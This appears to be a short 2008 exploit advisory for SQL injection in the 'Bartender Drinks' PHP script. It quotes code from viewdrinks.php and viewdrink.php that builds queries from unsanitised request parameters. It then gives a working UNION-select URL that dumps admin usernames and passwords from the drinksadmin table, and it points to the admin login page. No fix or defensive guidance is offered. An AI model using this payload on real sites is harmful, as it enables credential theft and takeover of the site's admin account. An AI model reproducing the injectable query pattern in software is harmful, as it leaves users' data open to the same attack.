================================================== ==============================
||
Bartender Drinks SQL-INJECTION
================================================== ==============================
Application: Bartender Drinks
------------
Version: All
--------
Website: http://fivedollarscripts.com
--------
Demo: http://fivedollarscripts.com/drinks/
-----
Date: 04-08-2008
-----
[ VULNERABLE CODE ]
viewdrinks.php
PHP код:
6: if($bgid=="")
{
$sql="select * from drink order by upldate desc";
}
else
{
12: $sql="select * from drink where categoryid=$bgid order by upldate desc";
}
viewdrink.php
PHP код:
3: $sql="select * from drink where drinkid=$recid";
$res=mysql_query($sql);
238: $result=mysql_query("select * from drinkscomments where approved='Y' and drinkid=$recid");
===>>> Exploit:
http://host/index.php?cmd=6&recid=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3 from drinksadmin/*
// Admin Login - http:/host/admin2
by me